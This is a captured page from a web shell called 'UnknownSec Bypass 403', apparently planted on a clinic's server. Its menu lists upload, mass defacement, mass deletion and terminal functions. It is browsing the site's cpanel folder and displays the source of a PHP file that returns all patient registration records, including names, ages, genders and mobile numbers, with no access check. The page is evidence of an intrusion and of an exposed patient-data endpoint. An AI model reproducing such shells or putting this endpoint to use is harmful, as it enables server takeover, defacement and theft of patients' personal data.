UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
cpanel
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
get_oldpatient.php
<?php require_once "../config.php"; $sql = "Select suhid,name,concat(age,' ',ageinyears) as age,gender,mobileno from registrationtb where isdeleted='0' and uhid is not null "; $resultset = mysqli_query($conn, $sql) or die("database error:". mysqli_error($conn)); $data = array(); while( $rows = mysqli_fetch_assoc($resultset) ) { $data[] = $rows; } $results = array( "sEcho" => 1, "iTotalRecords" => count($data), "iTotalDisplayRecords" => count($data), "aaData" => $data ); echo json_encode($results); ?>
Copyright © 2025 - UnknownSec